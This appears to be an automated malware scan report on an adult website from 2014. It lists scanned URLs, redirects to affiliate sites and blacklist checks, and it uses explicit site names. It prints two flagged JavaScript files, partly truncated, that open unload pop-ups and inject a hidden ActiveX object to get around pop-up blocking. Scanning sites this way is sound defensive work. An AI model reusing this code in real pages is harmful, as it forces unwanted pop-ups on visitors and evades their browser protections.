Scanned pages/files
Request | Server response | Status |
http://whorekingdom.com/ | 200 OK Content-Length: 32399 Content-Type: text/html | clean |
http://www.sexventura.com/lotpop.js | 200 OK Content-Length: 1439 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
var isXPSP2 = false;
var u = "6BF52A52-394A-11D3-B153-00C04F79FAA6";
function ext() {
  if(exit) {
    exit=false;
    if(!isXPSP2 && !usePopDialog) {
      window.open(popURL,"",popWindowOptions);
    } else if(!isXPSP2 && usePopDialog) {
      eval("window
function brs() {
  document.body.innerHTML+="<object id=iie width=0 height=0 classid='CLSID:"+u+"'></object>";
}
function ver() {
  isXPSP2 = (window.navigator.userAgent.indexOf("SV1") != -1);
  if(isXPSP2) brs();
}
var popURL = 'http://www.sexventura.com/lotpop.html';
isUsingSpecial = true;
eval("window.attachEvent('onload',ver);");
eval("window.attachEvent('onunload',ext);");
Antivirus reports:
http://whorekingdom.com/%20%09http://milflessons.bangbros1.com/pictures-rand/?PPS=zaglebie/ | 404 Not Found Content-Length: 366 Content-Type: text/html | clean |
http://whorekingdom.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://whorekingdom.com/linki/cfnmzone.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 25 Dec 2014 03:08:32 GMT Location: http://ww2.hardcorepartying.com/track/NjU4Mzo1OjEw/ Server: Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/1.0.1e-fips mod_bwlimited/1.4 Content-Length: 259 Content-Type: text/html; charset=iso-8859-1 | clean |
http://ww2.hardcorepartying.com/track/nju4mzo1ojew/ | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://whorekingdom.com/linki/asianbeaver.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 25 Dec 2014 03:08:38 GMT Location: http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=926149-0000&PA=951443&HTML=http://www.asiaorgasm.com Server: Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/1.0.1e-fips mod_bwlimited/1.4 Content-Length: 314 Content-Type: text/html; charset=iso-8859-1 | clean |
http://refer.ccbill.com/cgi-bin/clicks.cgi?ca=926149-0000&pa=951443&html=http://www.asiaorgasm.com | HTTP/1.1 302 Found Date: Thu, 25 Dec 2014 03:08:41 GMT Location: http://www.asiaorgasm.com Server: Apache Content-Length: 275 Content-Type: text/html; charset=iso-8859-1 Set-Cookie: 926149=CLICKS2zxeBFFYicJS1; expires=Saturday 27-Dec-14 20:08:41 GMT; path=/; domain=.ccbill.com X-Cnection: close | clean |
http://www.asiaorgasm.com/ | 200 OK Content-Length: 32681 Content-Type: text/html | clean |
http://www.asiaorgasm.com/sample-lonni.wmv | 200 OK Content-Length: 300670 Content-Type: video/x-ms-wmv | clean |
http://whorekingdom.com/linki/sample-lonni.wmv | 404 Not Found Content-Length: 339 Content-Type: text/html | clean |
http://whorekingdom.com/linki/join.html | 404 Not Found Content-Length: 332 Content-Type: text/html | clean |
http://whorekingdom.com/linki/member/ | 404 Not Found Content-Length: 330 Content-Type: text/html | clean |
http://whorekingdom.com/linki/2257.html | 404 Not Found Content-Length: 332 Content-Type: text/html | clean |
http://whorekingdom.com/links.htm | 404 Not Found Content-Length: 326 Content-Type: text/html | clean |
http://whorekingdom.com/black/hornylatina/hornylatina.html | 200 OK Content-Length: 9080 Content-Type: text/html | clean |
http://www.whorekingdom.com/pop/blackpop.js | 200 OK Content-Length: 1447 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
var isXPSP2 = false;
var u = "6BF52A52-394A-11D3-B153-00C04F79FAA6";
function ext() {
  if(exit) {
    exit=false;
    if(!isXPSP2 && !usePopDialog) {
      window.open(popURL,"",popWindowOptions);
    } else if(!isXPSP2 && usePopDialog) {
      eval("window
function brs() {
  document.body.innerHTML+="<object id=iie width=0 height=0 classid='CLSID:"+u+"'></object>";
}
function ver() {
  isXPSP2 = (window.navigator.userAgent.indexOf("SV1") != -1);
  if(isXPSP2) brs();
}
var popURL = 'http://www.whorekingdom.com/pop/blackpop.html';
isUsingSpecial = true;
eval("window.attachEvent('onload',ver);");
eval("window.attachEvent('onunload',ext);");
Antivirus reports:
http://whorekingdom.com/black/hornylatina/../../linki/pimpmyteen.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 25 Dec 2014 03:08:42 GMT Location: http://www.pimpmyblackteen.com/?wm_login=zaglebie Server: Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/1.0.1e-fips mod_bwlimited/1.4 Content-Length: 257 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.pimpmyblackteen.com/?wm_login=zaglebie | HTTP/1.1 301 Moved Permanently Date: Thu, 25 Dec 2014 02:54:09 GMT Location: http://www.pimpmyblackteen.com/tour3/?wm_login=zaglebie Server: Zeus/4.3 Content-Type: text/html X-Powered-By: PHP/4.4.1 | clean |
http://www.pimpmyblackteen.com/tour3/?wm_login=zaglebie | 200 OK Content-Length: 8663 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: whorekingdom.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Dec 2014 03:08:30 GMT
Server: Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Content-Type: text/html
X-Powered-By: PHP/5.3.29
Second query (visit from search engine):
GET / HTTP/1.1
Host: whorekingdom.com
Referer: http://www.google.com/search?q=whorekingdom.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=whorekingdom.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://whorekingdom.com/
Result: whorekingdom.com is not infected or malware details are not published yet.